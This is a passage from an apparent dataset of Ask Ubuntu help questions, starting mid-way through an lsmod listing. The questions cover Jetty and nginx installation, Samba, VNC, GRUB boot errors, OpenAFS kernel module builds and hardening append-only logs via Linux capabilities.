videobuf2_memops 13202 1 videobuf2_vmalloc snd_rawmidi 30417 1 snd_seq_midi btusb 22431 0 snd_seq_midi_event 14899 1 snd_seq_midi bluetooth 247165 24 bnep , rfcomm , btusb kvm_intel 137899 0 kvm 455932 1 kvm_intel snd_seq 61930 2 snd_seq_midi , snd_seq_midi_event snd_timer 29989 2 snd_pcm , snd_seq iwlwifi 183603 1 iwldvm snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq alx 73230 0 psmouse 97873 0 cfg80211 525326 3 iwldvm , mac80211 , iwlwifi mei 41820 0 mac_hid 13253 0 snd 69533 23 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 12680 1 snd snd_page_alloc 18798 2 snd_hda_intel , snd_pcm mdio 13807 1 alx wmi 19256 0 lpc_ich 17144 0 serio_raw 13215 0 microcode 23017 0 ideapad_laptop 18596 0 sparse_keymap 13890 1 ideapad_laptop lp 17799 0 parport 46562 3 parport_pc , ppdev , lp ghash_clmulni_intel 13259 0 aesni_intel 55495 1391 ablk_helper 13597 1 aesni_intel cryptd 20501 4 ghash_clmulni_intel , aesni_intel , ablk_helper lrw 13294 1 aesni_intel aes_x86_64 17255 1 aesni_intel xts 12922 1 aesni_intel gf128mul 14951 2 lrw , xts ahci 25879 4 i915 620571 4 libahci 31606 1 ahci drm_kms_helper 49597 1 i915 drm 287564 5 i915 , drm_kms_helper i2c_algo_bit 13564 1 i915 video 19652 1 i915
393738	what is the best way to install jetty on ubuntu ?	is there anyone here who downloaded and installed jetty on ubuntu ? please help . how did you install it ? i 've been trying for two days and i can not make it work . finally i did a clean install of ubuntu but still i am unable to download and install jetty . i tried these tutorials , none worked for me : ubuntu 12.04 â install jetty 9 how to install jetty web server in ubuntu nginx proxy to jetty for java apps i am running ubuntu 13.10 . edit 4 a @ a : ~ $ sudo apt-get install jetty libjetty8-extra-java libjetty8-java libjetty-extra-java libjetty-extra libjetty-java-doc jetty8 libjetty8-java-doc libjetty-java jsvc default-jre-headless apache2-utils adduser reading package lists ... done building dependency tree reading state information ... done adduser is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libjetty8-extra-java : depends : libtomcat7-java ( > = 7.0.28 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . edit3 a @ a : ~ $ sudo apt-get install jetty openjdk-7-jre-headless libjetty8-extra-java libjetty8-java libjetty-extra-java libjetty-extra libjetty-java-doc jetty8 libjetty8-java-doc libjetty-java jsvc java5-runtime-headless apache2-utils adduser reading package lists ... done building dependency tree reading state information ... done package java5-runtime-headless is a virtual package provided by : openjdk-6-jre-headless 6b27-1.12.6-1ubuntu2.1 gcj-4.8-jre-headless 4.8.1-10ubuntu9 gcj-4.6-jre-headless 4.6.4-1ubuntu1 openjdk-7-jre-headless 7u25-2.3.12-4ubuntu3 gcj-jre-headless 4:4.8.1-2ubuntu3 default-jre-headless 1:1.7-48ubuntu2 you should explicitly select one to install . e : package 'java5-runtime-headless ' has no installation candidate a @ a : ~ $ edit 2 a @ a : ~ $ sudo apt-get install jetty libjetty8-extra-java libjetty8-java libjetty-extra-java libjetty-extra libjetty-java-doc jetty8 libjetty8-java-doc libjetty-java jsvc java5-runtime-headless apache2-utils adduser reading package lists ... done building dependency tree reading state information ... done package java5-runtime-headless is a virtual package provided by : openjdk-6-jre-headless 6b27-1.12.6-1ubuntu2.1 gcj-4.8-jre-headless 4.8.1-10ubuntu9 gcj-4.6-jre-headless 4.6.4-1ubuntu1 openjdk-7-jre-headless 7u25-2.3.12-4ubuntu3 gcj-jre-headless 4:4.8.1-2ubuntu3 default-jre-headless 1:1.7-48ubuntu2 you should explicitly select one to install . e : package 'java5-runtime-headless ' has no installation candidate a @ a : ~ $ edit 1 i tried dumindu mahawela 's answer but this is what i get : a @ a : ~ $ sudo apt-get install jetty libjetty8-extra-java libjetty8-java libjetty-extra-java libjetty-extra libjetty-java-doc jetty8 libjetty8-java-doc libjetty-java jsvc default-jre-headless apache2-utils adduser [ sudo ] password for a : reading package lists ... done building dependency tree reading state information ... done adduser is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libjetty8-extra-java : depends : libtomcat7-java ( > = 7.0.28 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
393743	errors with vps.me free	i need your help . i 'm a total noob about linux , thats why i need you to help me by telling me what to do , step by step . my problem is that i have only ipv6 from vps.me hosting and i want to connect via remote desktop . i found tutorial link but i have some errors . the error i am getting is : error in tightvnc viewer : connection parameters ( host , port , socket , gates ) is empty
393745	chromium on vnc wo n't start	running lubuntu vnc , i get the following error and chromium is unable to start : xlib : extention `` randr '' missing on desktop :1 this seems to be a possible solution : how to make chromium-browser start on vnc display ? but i do n't know how to create separate chromium config files and run them seperately as suggested . i tried running from terminal chromium-browser -- user-data-dir but did not help resolve . any idea how to get chromium to run on a remote server running lubuntu-desktop ? edit : i also tried chromium-browser -- user-data-dir=~/.config/chromium/ $ display `` $ @ '' with no results . maybe this is not the root cause of the issue .
393746	how to automatically run a specific command on live usb on boot ?	i can mount my live ubuntu partition with this sudo mount -o remount , rw /cdrom what i 'm asking is simple.how to make that command running automatically on every live usb boot ? thankyou
393755	huawei uml397 u.s. cellular 4g lte broadband usb modem ?	i am using zorin os 6 lts , which i believe is technically ubuntu 12.04 lts . anyway , i was using an older 3g modem from u.s. cellular , and it worked perfectly with an easy setup ( following this guide ) but now they wanted me to upgrade to the huawei uml397 4g lte usb broadband modem . i was okay with this , since 4g lte should be faster ( what is the difference between 4g and 4g lte anyway ? ) i expected a setup as easy as the last , and it showed up under the list of available adapters . but i got to the step where i select my provider ( u.s. cellular ) , and it was n't listed ! i tried to enter it in , but then it asked for more information that it did n't with the last adapter ! it asked me for an apn , and when i asked u.s. cellular for it , they asked `` what 's an apn ? '' . is this a generic number , or one specific to my account/adapter ? i could n't find any info on my apn number online , except for ones for phones . what should i do ? i also tested this on my regular ubuntu 12.04 lts computer , and got the same result !
393756	ca n't ping any websites , but can access websites through browser	i 'm using ubuntu 13.10 running on the newest version of macbook pro ( dual boot ) . i 'm using wireless connection to access websites through the chrome browser and it works . but ping does n't work . for example , this is the output $ ping -c 3 www.google.com ping www.google.com ( 74.125.226.212 ) 56 ( 84 ) bytes of data . -- - www.google.com ping statistics -- - 3 packets transmitted , 0 received , 100 % packet loss , time 2015ms it seems that it is not the issue of name resolving . so what could be wrong ? i 'm not using a proxy for my browser . this is the output of tracepath $ tracepath www.google.com 1 : < my machine name > .local 0.052ms pmtu 1500 1 : no reply 2 : no reply 3 : no reply ... too many hops : pmtu 1500 resume : pmtu 1500 edit : after re-installing ubuntu , ping works again .
393757	ubuntu on a secondary drive	new to the site , not ubuntu . i 'm currently running windows 7 on a 1 tb hdd , as it is my primary . i 'd like to install ubuntu on a secondary hdd in which i have an enclosure for . it has windows 8 on it , but i 'm having issues accessing it . i 'd like to install on that but remove 8 in the process . i have the ubuntu installer on a flash drive ready to go , but i 'm unsure of how to get the flash drive to install on the external hdd . any help is appreciated . on a side note : i 've had ubuntu dual-booted with windows 7 before , but i seem to have issues with it , that 's why i 'm doing an external hdd .
393761	ca n't boot after change splash multi boot on ubuntu 12.04	i just got a problem on my pc . i have install/change grub splash image to my ubuntu , but there 's a problem , when i restart , it ca n't display grub but an error screen . then i restart more but it seems have a same result . can you help me ? ? ? ? please !
393765	how can i get a exfat drive to ( auto ) mount ?	i have a flash drive that is formatted exfat and when i plug it into my ubuntu machine i get a mount error . how can i auto-mount exfat formatted drives ?
393768	rhythmbox and conky do not work together but they work individually	i 'm using hardy-conky on my laptop running 12.10 and on my main pc running saucy 13.10 neither are able to run rhythm box and conky at the same time . i run rhythm box and conky disappears . i close rhythm box and conky reappears . the program never crashes . this is important . the conky process continues running it just disappears for some reason . there 's no update from the terminal i 'm running conky in . here 's my conkyrc : tried to google this but there 's nothing on the issue which is hilarious . i have looked through my conkyrc and removed anything under the if rhythmbox part . all that was in there was some script to look for a lyricsdownloader # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # conky by http : //jameshardy88.deviantart.com/art/conky-jameshardy88-122466724 # # # # modified by umair - http : //www.noobslab.com # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # use xft ? use_xft yes xftfont dejavu sans : size=8 xftalpha 0.8 text_buffer_size 2048 # update interval in seconds update_interval 1 # this is the number of times conky will update before quitting . # set to zero to run forever . total_run_times 0 # create own window instead of using desktop ( required in nautilus ) own_window yes own_window_transparent yes own_window_type conky own_window_argb_visual yes own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager # use double buffering ( reduces flicker , may not work for everyone ) double_buffer yes # minimum size of text area minimum_size 160 0 # maximum_width 200 # draw shades ? draw_shades no # draw outlines ? draw_outline no # draw borders around text draw_borders no # stippled borders ? stippled_borders 0 # border margins border_margin 5 # border width border_width 1 # default colors and also border colors default_color ffffff # default_shade_color black # default_outline_color white own_window_colour white # text alignment , other possible values are commented # alignment top_left alignment top_right # alignment bottom_left # alignment bottom_right # gap between borders of screen and text # same thing as passing -x at command line gap_x 15 gap_y 20 # subtract file system buffers from used memory ? no_buffers yes # set to yes if you want all text to be in uppercase uppercase no # number of cpu samples to average # set to 1 to disable averaging cpu_avg_samples 1 # number of net samples to average # set to 1 to disable averaging net_avg_samples 2 # force utf8 ? note that utf8 support required xft override_utf8_locale yes # add spaces to keep things from moving about ? this only affects certain objects . use_spacer none text $ { if_running rhythmbox } $ { else } system $ { hr 2 } $ { voffset 2 } $ { font openlogos : size=16 } u $ { font } kernel : $ { alignr } $ { kernel } $ { font stylebats : size=16 } a $ { font } cpu : $ { cpu } % $ { alignr } $ { cpubar cpu0 8,60 } $ { font stylebats : size=16 } g $ { font } ram : $ memperc % $ { alignr } $ { membar 8,60 } $ { font stylebats : size=16 } j $ { font } swap : $ swapperc % $ { alignr } $ { swapbar 8,60 } $ { font webdings : size=16 } ~ $ { font } battery : $ { battery_percent bat1 } % $ { alignr } $ { battery_bar 8,60 bat1 } $ { font stylebats : size=16 } q $ { font } uptime : $ { alignr } $ { uptime } $ { font stylebats : size=16 } k $ { font } processes : $ { alignr } $ processes ( $ running_processes running ) highest cpu $ alignr cpu % mem % $ { hr 1 } $ { top name 1 } $ alignr $ { top cpu 1 } $ { top mem 1 } $ { top name 2 } $ alignr $ { top cpu 2 } $ { top mem 2 } $ { top name 3 } $ alignr $ { top cpu 3 } $ { top mem 3 } hd $ { hr 2 } $ { font pie charts for maps : size=14 } 7 $ { font } $ { voffset -5 } home : $ { voffset 4 } $ { fs_free /home } / $ { fs_size /home } $ { alignr } $ { fs_bar 8,60 /home } $ { font pie charts for maps : size=14 } 7 $ { font } network $ { hr 2 } $ { if_existing /proc/net/route wlan0 } $ { voffset -6 } $ { font pizzadude bullets : size=14 } o $ { font } up : $ { upspeed wlan0 } kb/s $ { alignr } $ { upspeedgraph wlan0 8,60 } $ { voffset 4 } $ { font pizzadude bullets : size=14 } u $ { font } down : $ { downspeed wlan0 } kb/s $ { alignr } $ { downspeedgraph wlan0 8,60 } $ { voffset 4 } $ { font pizzadude bullets : size=14 } n $ { font } upload : $ { alignr } $ { totalup wlan0 } $ { voffset 4 } $ { font pizzadude bullets : size=14 } t $ { font } download : $ { alignr } $ { totaldown wlan0 } $ { voffset 4 } $ { font pizzadude bullets : size=14 } z $ { font } signal : $ { wireless_link_qual wlan0 } % $ { alignr } $ { wireless_link_bar 8,60 wlan0 } $ { voffset 4 } $ { font pizzadude bullets : size=14 } a $ { font } local ip : $ { alignr } $ { addr wlan0 } $ { voffset 4 } $ { font pizzadude bullets : size=14 } b $ { font } public ip : $ { alignr } $ { execi 1 ~/.conky/ip.sh } $ { else } $ { font pizzadude bullets : size=14 } 4 $ { font } network unavailable $ { endif } $ { endif }
393770	after restarting computer , ubuntu will not boot . ( error : unknown filesystem )	i think ubuntu is the only os on my computer.. it previously had windows but i am not sure if windows is still installed . i installed some updates in ubuntu and after restarting my computer , i got the black error : unknown filesystem screen . how do i boot ubuntu ? i am new to linux . ps : running elementary os built on ubuntu i tried the following steps , but after typing insmod normal , i got a message saying error : no such partition and set root= ( hd0,6 ) set prefix= ( hd0,6 ) /boot/grub insmod normal normal sudo update-grub ( run this in terminal after getting into ubuntu ) sudo grub-install /dev/sda ( run this in terminal after getting into ubuntu )
393771	dual boot windows 8 and ubuntu in acer aspire e1-572	how to make dual boot windows 8 and ubuntu in acer aspire e1-572.please help me ... i have usb bootable with universal-usb-installer-1.9.4.9 and when try to install it in system , it halts.. plz help me to resolve it .
393772	how do i reset all gsettings key to their default values ?	i want to reset all keys in the gsettings to their default values ; preferably using a single command , or a simple bash script . how can i get that done ?
393774	samba share not visible from windows 7 pc , even though unc authentication works	i 'm running xbmcbuntu 12.10 on an htpc with the server hostname 'screen ' , and trying to setup samba to allow access to a share called 'movies ' by mapping username/password credentials to a unix user account ( i do n't want to allow guest access . ) the name of the user is 'user ' . i am able to log into the samba server from my windows 7 pc 's via the unc path \\192.168.1.103 or via \\screen . i am prompted for the the username and password , and when i enter them , it accepts them . ( i set this up via smbusers , mapping the password via passwd . ) i know the security settings are correct because if i use incorrect credentials at the prompt , it gives me an error . the problem is that i ca n't see the shared folder that i have defined in smb.conf . i.e . i just get a blank window in explorer with no error . and if i try browsing directly to the share via \\192.168.1.103\movies , it just says `` windows can not access \192.168.1.103\movies - error code : 0x80070035 the network path was not found. '' . i have a few other observations that might be relevant : the config file in /etc/samba/smb.conf is blank . the one that seems to be applicable is in /usr/share/samba/smb.conf . sudo testparm -s smb.conf > smb.conf.good fails with -bash : smb.conf.good : permission denied the /var/log/samba/log.smbd does n't seem to contain any errors : [ 2013/12/20 21:35:28 , 0 ] smbd/server.c:1053 ( main ) smbd version 3.6.6 started . copyright andrew tridgell and the samba team 1992-2011 [ 2013/12/20 21:35:28.852983 , 0 ] smbd/server.c:1109 ( main ) standard input is not a socket , assuming -d option my smb.conf : [ global ] workgroup = workgroup server string = % h server ( samba , ubuntu ) dns proxy = no log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d security = user username map = /usr/share/samba/smbusers usershare prefix deny list = / encrypt passwords = no passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user [ movies ] path=/home/user/movies browseable = yes guest ok = no read only = no create mask = 0777 directory mask = 0777 writeable = yes valid users = user
393776	wireless n option not recognized	i have an intel centrino wireless-n 1030 in my laptop and ubuntu is not recognizing that it supports wireless `` n '' connections ; it only lists b and g. lshw -c network : ... *-network description : wireless interface product : centrino wireless-n 1030 [ rainbow peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : wlan0 version : 34 serial : 4c:80:93:8a:6a:10 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.5.0-44-generic firmware=18.168.6.1 ip=172.20.10.3 latency=0 link=yes multicast=yes wireless=ieee 802.11bg resources : irq:56 memory : f7a00000-f7a01fff the issue is that i am only allowing wireless n connections through my router ; for this reason i am unable to connect . is there any way to get iwlwifi to recognize this option ?
393780	does `` everything is a file '' apply to network printers ?	if `` everything is a file , '' can i access network ( ipp ) printers like usb printers ( /dev/usb/lp0 ) ? if so , where ?
393781	what is required to enable outbound connections from a chroot jail ?	i have apache2 running in a chroot jail , using the apache config option 'chrootdir /chroot ' , the os is ubuntu pangolin 12.04 . the jail ( 'chroot ' dir ) is manually built , with a minimal set of files , but various python libraries and other binary dependencies have been copied into the jail . apache works ok , and the wsgi scripts work , with one exception . they need to make http requests , and those requests are being blocked , with 'name or service not known ' , type errors . /proc , /sys , and /dev have been mounted in the jail , with : sudo mount -- bind /proc /chroot/proc sudo mount -- bind /sys /chroot/sys sudo mount -- bind /dev /chroot/dev what else is required to enable socket connections out from the chroot jail ? edit : it can successfully connect to a server on the local machine outside the jail . maybe the problem is with domain resolution . /etc/resolv.conf has been copied into the jail . is anything more required for successful domain resolution ? edit2 : it is a domain resolution issue , as connections to outside ip addresses also work .
393782	how can i hide the bluetooth icon in gnome shell 3.8.4 ( ubuntu 13.10 ) ?	both the extensions are outdated and the extension icon hider which hides multiple icons forces all icons to appear before allowing you to hide ( thus conflicting with other extensions that show/hide icons on specific conditions ) .
393783	installing windows7 on ubuntu 13.10	im going to make a windows 7 live usb right now , but im wondering how can i just install windows 7 ? i dont want ubuntu anymore . thanks
393785	how do i change the delay when i open gnome 3 dash ?	is there a way of changing the delay of the dash in gnome shell , when i point the mouse to the top left corner ? i 'm using gnome shell 3.8.4
393787	how do i fix the seizure-o-matic problem on the nexus 7 ?	bryan lunduke describes the freeze and flicker problem that 's dogging ubuntu touch as the seizure-o-matic 3000 . is there any way to get around this problem ? i would really like to use ubuntu touch as the daily driver on my nexus 7 . i 'm using the nexus 7 3g tilapia .
393789	how do i get my lifecam vx-7000 working on ubuntu 13.10 ?	my kernel version : 3.11.0-14-generic kernel log : kernel : [ 221.693346 ] usb 2-6 : usb disconnect , device number 3 kernel : [ 224.952130 ] usb 2-6 : new high-speed usb device number 4 using ehci-pci kernel : [ 225.088051 ] usb 2-6 : new usb device found , idvendor=045e , idproduct=0723 kernel : [ 225.088062 ] usb 2-6 : new usb device strings : mfr=1 , product=2 , serialnumber=0 kernel : [ 225.088071 ] usb 2-6 : product : microsoft速 lifecam vx-7000 kernel : [ 225.088078 ] usb 2-6 : manufacturer : microsoft kernel : [ 225.088990 ] uvcvideo : found uvc 1.00 device microsoft速 lifecam vx-7000 ( 045e:0723 ) kernel : [ 225.089411 ] uvcvideo : uvc non compliance - get_def ( probe ) not supported . enabling workaround . kernel : [ 225.089789 ] uvcvideo : failed to query ( 129 ) uvc probe control : -32 ( exp . 26 ) . kernel : [ 225.089798 ] uvcvideo : failed to initialize the device ( -5 ) . other posts recommend upgrading uvcvideo to the latest version but i 'm sure i have that already . lsusb shows that this camera is uvc-compliant i 'm stumped and would love some more info on where to look next .
393790	uninstall windows and ubuntu	i am making the full switch to ubuntu ! in order to do so i want to wipe my hard drive entirely to remove all of the viruses and what not and then do a clean install of ubuntu . however , i am not sure how to wipe my hard drive safely and properly . thanks !
393792	trouble ssh-ing into router	i am trying to access my router from the terminal and i keep getting an error . does anyone know how to obtain a `` publickey ? '' this is the output with the -v option : i tried reading through the similar posts on the issue , but found no useful information . i was able to edit the ssh_config file and un-comment the setting called `` passwordauthentication yes '' to see if that would solve it , but no luck .
393794	desktop wall paper goes black , desktop is almost in accessible	i am not sure if installing cinnamon desktop is causing the issue . but desktop wall paper becomes black , and system hangs ( no such issue in w7 64 bit ) . even from launcher some open application goes to the black hole . i have ubuntu tweak and in unity settings , i got the error posted below . please let me know how to uninstall cinnamon desktop on ubuntu 12.04 lts 64 bit . error code : '' distribution : ubuntu 12.04 precise application : ubuntu tweak 0.6.0-1~oneiric1 desktop : ubuntu traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/ubuntutweak/main.py '' , line 444 , in _load_module page = module ( ) file `` /usr/lib/python2.7/dist-packages/ubuntutweak/tweaks/unity.py '' , line 69 , in __init__ enable_reset=true ) , file `` /usr/lib/python2.7/dist-packages/ubuntutweak/factory.py '' , line 46 , in create return getattr ( cls , 'do_composite_create ' ) ( widget , **kwargs ) file `` /usr/lib/python2.7/dist-packages/ubuntutweak/factory.py '' , line 59 , in do_composite_create new_widget = globals ( ) .get ( widget ) ( **kwargs ) file `` /usr/lib/python2.7/dist-packages/ubuntutweak/gui/widgets.py '' , line 207 , in __init__ self._setting = compizsetting ( key=key ) file `` /usr/lib/python2.7/dist-packages/ubuntutweak/settings/compizsettings.py '' , line 69 , in __init__ self._setting = self._plugin.create_setting ( setting_name , target ) file `` /usr/lib/python2.7/dist-packages/ubuntutweak/settings/compizsettings.py '' , line 58 , in create_setting return settings [ key ] keyerror : 'launcher_reveal_edge_timeout ' ``
393795	ubuntu 12.0.4.3 dektop operating system	hello sir i have downloaded the ubuntu setup file in compressed format , now i would like to boot it from pen drive , without affecting the existing operating system how can i do it.please provide me some instructions.o
393797	i need a program to create a website like page but it can not be online at all	i am after a program that i can basically like creating a webpage but do not want the page to be online at all . so i can add data like videos , pictures and text and design . is there anything available like that . it needs to look like a webpage so you can click and go to different sections ect . some people have mentioned powerpoint but the problem with that is that does not automatically update hyperlinks so i have been told . is there anyone that can help . thanks
393808	error in installing updates	errors were encountered while processing : /var/cache/apt/archives/linux-firmware_1.79.9_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
393809	checking if vim is installed successfully in ubuntu 12.04	i am a newbie in linux , maybe it 's a silly question but could not make it though . i have ubuntu 12.04 installed without gnome and now as i wanted to know more about linux am facing few queries . i want to write a script which will automate few daily task . now i have opened terminal and selected bash ( default ) by typing echo $ shell to write a script i found that a editor is the choise like vi or vim . firstly can i do script in open terminal/bash without installing vim . i have installed vim with the following cmd sudo apt-get install vim . how to check from cli whether vim is successfully installed and where can i find the files in the directories .
393811	turn screen off by pressing scroll lock	i would like to change the function of scroll lock . after pressing scroll lock , it should turn off the screen ( and of course no backlight ) . i have tried the following : have set the custom command `` xset dpms force off '' for the scroll lock in the keyboard shortcuts in ubuntu system . but no effect . have tried also to set by script using autokey ( which i use for other purposes ) . but no effect . my target is to make it simple , and not to write some big scripts and to let them load every time i want the screen off . i have read something about remaping through xmodmap , but ... if i use xev in terminal , then after pressing scroll_lock : focusin event , serial 38 , synthetic no , window 0x6200001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 38 , synthetic no , window 0x0 , keys : 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 focusout event , serial 38 , synthetic no , window 0x6200001 , mode notifynormal , detail notifynonlinear ... and there is no info about keycode ... kind regards pepo
393817	how do we switch to another folder using terminal commands ?	in olden days of dos , we had cd command to switch folders . the case does not seem same like dos . please help
393818	are there any credible alternatives to xbmc as a media server that can also be used to stream video to a tablet or other android device ?	i 've connected a pc running ubuntu 12.04 with xbmc installed . i am looking to get it replaced with a raspberry pi for the power-usage benefits and smaller footprint . i would like to have a single media center that i can use to not only manage my media ( xbmc does a great job of that ) , but that i can also use to stream video to other android devices in the house , over wifi . does anybody have a how-to doc on this for a solution i could follow ? thanks .
393827	i ca n't add any ppa	i do n't know why but after a while i ca n't add any working ppa any more ! when i try this : sudo add-apt-repository ppa : webupd8team/tor-browser the output is : can not add ppa : 'ppa : webupd8team/tor-browser ' . please check that the ppa name or format is correct . i have ubuntu 13.10 64bit .
393829	openafs module build problem kernel 3.12.6 under 13.10	just installed ubuntu 13.10 on macbook pro 10,1 . i upgraded the kernel to 3.12.6 in vain hope that the thunderbolt display would work ( it did n't ) and hot plugging would work ( it did n't ) ( but installing nvidia proprietary drivers 331.20 did help with the display ) . i would like to install openafs client however building the kernel module fails . i run : sudo module-assistant prepare openafs-modules module-assistant auto-build openafs-modules module building fails , i attatch the relevant snip of the log file : building in directory : modload-3.12.6-031206-generic-sp make [ 4 ] : entering directory `/usr/src/modules/openafs/src/libafs/modload-3.12.6-031206-generic-sp' makefile.common:50 : warning : overriding commands for target `.c.o' /usr/src/modules/openafs/src/config/makefile.config:141 : warning : ignoring old commands for target `.c.o' env extra_cflags= '' '' /usr/src/modules/openafs/src/libafs/make_kbuild_makefile.pl modload-3.12.6-031206-generic-sp openafs.ko /usr/src/modules/openafs/src/config/makefile.config makefile.afs makefile.common env extra_cflags= '' '' make -c /usr/src/linux m=/usr/src/modules/openafs/src/libafs/modload-3.12.6-031206-generic-sp modules 2 > & 1 | tee .makelog make [ 5 ] : entering directory `/usr/src/linux-headers-3.12.6-031206-generic' cc [ m ] /usr/src/modules/openafs/src/libafs/modload-3.12.6-031206-generic-sp/afs_error.o in file included from /usr/src/modules/openafs/src/afs/afs_osi.h:440:0 , from /usr/src/modules/openafs/src/rx/rx_clock.h:46 , from /usr/src/modules/openafs/src/rx/rx.h:29 , from /usr/src/modules/openafs/src/afs/afsincludes.h:30 , from /usr/src/modules/openafs/src/libafs/modload-3.12.6-031206-generic-sp/afs_error.c:34 : /usr/src/modules/openafs/src/afs/linux/osi_machdep.h : in function ‘afs_set_cr_uid’ : /usr/src/modules/openafs/src/afs/linux/osi_machdep.h:160:17 : error : incompatible types when assigning to type ‘kuid_t’ from type ‘uid_t’ cred- > fsuid = uid ; ^ /usr/src/modules/openafs/src/afs/linux/osi_machdep.h : in function ‘afs_set_cr_gid’ : /usr/src/modules/openafs/src/afs/linux/osi_machdep.h:164:17 : error : incompatible types when assigning to type ‘kgid_t’ from type ‘gid_t’ cred- > fsgid = gid ; ^ /usr/src/modules/openafs/src/afs/linux/osi_machdep.h : in function ‘afs_set_cr_ruid’ : /usr/src/modules/openafs/src/afs/linux/osi_machdep.h:168:15 : error : incompatible types when assigning to type ‘kuid_t’ from type ‘uid_t’ cred- > uid = uid ; ^ /usr/src/modules/openafs/src/afs/linux/osi_machdep.h : in function ‘afs_set_cr_rgid’ : /usr/src/modules/openafs/src/afs/linux/osi_machdep.h:172:15 : error : incompatible types when assigning to type ‘kgid_t’ from type ‘gid_t’ cred- > gid = gid ; ^ make [ 6 ] : *** [ /usr/src/modules/openafs/src/libafs/modload-3.12.6-031206-generic-sp/afs_error.o ] error 1 make [ 5 ] : *** [ _module_/usr/src/modules/openafs/src/libafs/modload-3.12.6-031206-generic-sp ] error 2 make [ 5 ] : leaving directory `/usr/src/linux-headers-3.12.6-031206-generic' rm .makelog when i try to install openafs-modules-dkms the details window in synaptic says : selecting previously unselected package openafs-modules-dkms . ( reading database ... 230488 files and directories currently installed . ) unpacking openafs-modules-dkms ( from ... /openafs-modules-dkms_1.6.5-1ubuntu3_all.deb ) ... setting up openafs-modules-dkms ( 1.6.5-1ubuntu3 ) ... loading new openafs-1.6.5 dkms files ... first installation : checking all kernels ... building only for 3.12.6-031206-generic building initial module for 3.12.6-031206-generic error ( dkms apport ) : kernel package linux-headers-3.12.6-031206-generic is not supported error ! bad return status for module build on kernel : 3.12.6-031206-generic ( x86_64 ) consult /var/lib/dkms/openafs/1.6.5/build/make.log for more information . in the make.log file the errors are the same as when building through the module-assistant ( just the paths to the files indicated are different ) does anyone know a solution to this ? thanks a lot ! wojtek
393831	unable to locate package glibc	i have a command which has been run on ubuntu 10.10 : $ apt-get install samba nfs-kernel-server vim-nox autofs automake make perl gcc glibc i 'm trying to perform it on ubuntu 12.04 i 've installed glibc-devel conforming to this link . i still get the error when i run my code . is glibc installed on ubuntu 12 by default ? if it is , how can i fix the error by locating it ? if not , how should i install it ? thanks : )
393833	secondary display for video playback only	i have two displays . one monitor ( displayport-0 ) for work and one tv ( hdmi-0 ) for movies . xrandr says both connected , but i configured screen/desktop just to monitor , because i do n't want any window to stray to tv . on tv i want only video output . is there any media player , utility program or any command line tool , that will allow me send video output to tv , means send it to display , that is connected but out of screen ? i use radeon driver and gpu radeon hd6xxx family . i totally lack experience here so thanks for any advice . edit : oh , and i run elementary os based on ubuntu 12.04 edit-1 : there seems to be common solution for this by setting two separate screens , one for each display . in the past , one would fiddle with xorg.conf . these days , people achieve that through amd proprietary driver . i 'll try both way and will post my results here .
393839	how to remove linux capabilities ?	one useful attribute for protecting log files is append-only . when this attribute is set , the file can not be deleted , and writes are only allowed to append to the end of the file . obviously , an intruder who has gained root privileges could realize that file attributes are being used and just remove the append-only flag from the logs by running chattr -a . to prevent this , weâll need to disable the ability to remove the append-only attribute . to accomplish this under linux , use its capabilities mechanism . to prevent a user from removing the append-only attribute from a file , we need to remove the cap_linux_immutable capability . how to remove this capability ? lcap utility was previously used for this purpose , but it is currently not available for ubuntu . is there any other way to remove linux kernel capabilities ? recounting : i success to install lcap_0.0.6 in ubuntu server 13.04 but after run the following command i get an error message : sudo ./lcap cap_linux_immutabe /proc/sys/kernel/cap-bound : no such file or directory
393841	building nginx on ubuntu with cache_purge module - help ?	i have been trying to rebuild nginx with cache_purge module from http : //labs.frickle.com/ . i did the following and somehow the new build does n't seem to include the module . here is what i did : installed nginx stopped it installed build tools using : aptitude -y install build-essential libc6 libpcre3 libpcre3-dev libpcrecpp0 libssl0.9.8 libssl-dev zlib1g zlib1g-dev lsb-base then : cd /usr/src/ sudo wget http : //nginx.org/download/nginx-1.5.8.tar.gz sudo wget http : //labs.frickle.com/files/ngx_cache_purge-2.1.tar.gz tar -xvf nginx-1.5.8.tar.gz tar -xvf ngx_cache_purge-2.1.tar.gz cd nginx-1.5.8 then i did this : sudo ./configure -- add-module=/usr/src/ngx_cache_purge-2.1 the terminal sprouted a lot of things . then i did : sudo make & & sudo make install finally though , when i do nginx -v , i do n't see my module in the list . i see only this : nginx version : nginx/1.4.1 ( ubuntu ) tls sni support enabled configure arguments : -- prefix=/usr/share/nginx -- conf-path=/etc/nginx/nginx.conf -- error-log-path=/var/log/nginx/error.log -- http-client-body-temp-path=/var/lib/nginx/body -- http-fastcgi-temp-path=/var/lib/nginx/fastcgi -- http-log-path=/var/log/nginx/access.log -- 